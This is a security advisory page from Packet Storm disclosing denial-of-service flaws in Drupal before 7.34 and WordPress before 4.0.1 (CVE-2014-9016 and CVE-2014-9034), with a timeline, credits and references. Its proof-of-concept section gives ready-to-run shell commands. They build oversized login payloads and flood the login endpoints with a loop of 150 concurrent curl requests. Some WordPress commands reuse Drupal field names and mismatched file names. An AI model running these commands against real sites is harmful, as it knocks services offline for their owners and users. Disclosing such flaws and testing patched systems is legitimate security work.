A vulnerability present in Drupal versions prior to 7.34 and WordPress versions prior to 4.0.1 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).
691c983b834cd1c1cc4abb9e799af2e45516125311bba33d60aa227a917ea11b====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Wordpress < 4.0.1 and Drupal < 7.34 allows an
attacker to send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).
====================================================================
Time Line:
====================================================================
November 19, 2014 - A Drupal security update and the security advisory
is published.
November 20, 2014 - A Wordpress security update and the security
advisory is published.
====================================================================
Proof of Concept:
====================================================================
Drupal Denial of Service CVE-2014-9016
Generate a pyaload and try with a non-valid user:
$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &
Generate a pyaload and try with a valid user:
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &
Perform a Dos with a valid user:
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done
Wordpress Denial of Service CVE-2014-9034
Generate a pyaload and try with a non-valid user:
$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &
Generate a pyaload and try with a valid user:
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &
Perform a Dos with a valid user:
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done
====================================================================
Authors:
====================================================================
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
====================================================================
References:
====================================================================
* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed